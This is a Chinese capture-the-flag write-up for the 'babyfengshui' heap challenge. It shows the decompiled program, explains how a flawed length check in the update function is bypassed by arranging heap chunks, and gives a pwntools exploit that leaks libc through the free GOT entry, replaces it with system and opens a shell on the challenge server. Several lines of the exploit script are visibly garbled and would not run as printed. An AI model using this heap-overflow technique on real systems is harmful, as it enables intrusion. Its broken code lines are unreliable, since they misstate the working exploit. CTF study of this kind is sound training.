程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。
主函数:
void __cdecl __noreturn main()
{char v0; // [esp+3h] [ebp-15h]int v1; // [esp+4h] [ebp-14h]size_t v2; // [esp+8h] [ebp-10h]unsigned int v3; // [esp+Ch] [ebp-Ch]v3 = __readgsdword(0x14u);setvbuf(stdin, 0, 2, 0);setvbuf(stdout, 0, 2, 0);while ( 1 ){puts("0: Add a user");puts("1: Delete a user");puts("2: Display a user");puts("3: Update a user description");puts("4: Exit");printf("Action: ");if ( __isoc99_scanf("%d", &v1) == -1 )break;if ( !v1 ){printf("size of description: ");__isoc99_scanf("%u%c", &v2, &v0);Add(v2);}if ( v1 == 1 ){printf("index: ");__isoc99_scanf("%d", &v2);delete(v2);}if ( v1 == 2 ){printf("index: ");__isoc99_scanf("%d", &v2);display(v2);}if ( v1 == 3 ){printf("index: ");__isoc99_scanf("%d", &v2);update(v2);}if ( v1 == 4 ){puts("Bye");exit(0);}if ( (unsigned __int8)count > 49u ){puts("maximum capacity exceeded, bye");exit(0);}}exit(1);
}Add:
Add函数进行了两次堆的申请,并且把第一次申请的堆的地址赋值到第二次申请的堆的数据之中,由此可以判断出此函数利用了一个结构体,而第二次申请的堆的大小是固定的,可以得到结构体的数据结构:
struct Node{char * description;char name[0x7C];
}
s便是description的空间地址,而v2则是结构体的空间。
delete:
检查空间是否存在,free掉前面申请的空间并赋值为0。
display:
显示数据
update:
更新description里面的数据,需要注意的是其检查数据长度的方式(13行),是以description堆块的起始地址和name的起始地址之间的长度。
由于update函数中的判断数据长度是否合法的方式有问题,可以通过申请连续小堆块,再释放申请大堆块的方式绕过。
具体方式如下:
1.首先申请连续的3个结构体,description部分空间大小为0x80,方便计算:
| 堆块 0des 0x80 | 堆块0 node 0x80 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 |
|---|
2.释放第一个结构体,得到一个空闲的0x100的堆块:
| 空闲堆块 0x100 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 |
|---|
3.申请新的结构体,其description部分为0x100,根据linux堆的性质,会优先分配空闲的堆块,释放得到的空闲堆块可以满足description的空间需求,而node的空间需要新分配,得到下面的结构:
| 堆块 0 des 0x100 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 | 堆块0 node 0x80 |
|---|
根据判断数据合法长度的方式,堆块0的des和name相差地址为之间堆块的长度的和,绕过了长度判断,可以利用堆溢出来修改中间堆块的块首,得到libc,然后得到shell。
新版的libc其堆的机制有所改变(libc2.26及以上的,增加了tcache机制),不能以此利用
from pwn import *
from LibcSearcher import *context.log_level = 'debug'#p = process('./babyfengshui')
p = remote('node3.buuoj', 28668)
elf = ELF('babyfengshui')def Add(size, length, text):p.sendlineafter("Action: ", '0')p.sendlineafter("description: ", str(size))p.sendlineafter("name: ", 'qin')p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)def Del(index):p.sendlineafter("Action: ", '1')p.sendlineafter("index: ", str(index))def Dis(index):p.sendlineafter("Action: ", '2')p.sendlineafter("index: ", str(index))def Upd(index, length, text):p.sendlineafter("Action: ", '3')p.sendlineafter("index: ", str(index))p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)Add(0x80, 0x80, 'qin')
Add(0x80, 0x80, 'qin')
Add(0x8, 0x8, '/bin/shx00')
Del(0)#注意堆块块首的长度
Add(0x100, 0x19c, "a"*0x198+['free']))
Dis(1)
p.recvuntil("description: ")
free_addr = v(4))libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
sys_addr = libc_base + libc.dump('system')#堆块1的description指针已经被修改为free的地址,则可以将free地址内的内容替换为system
Upd(1, 0x4, p32(sys_addr))
Del(2)p.interactive()
本文发布于:2024-01-28 22:43:42,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170645302610824.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
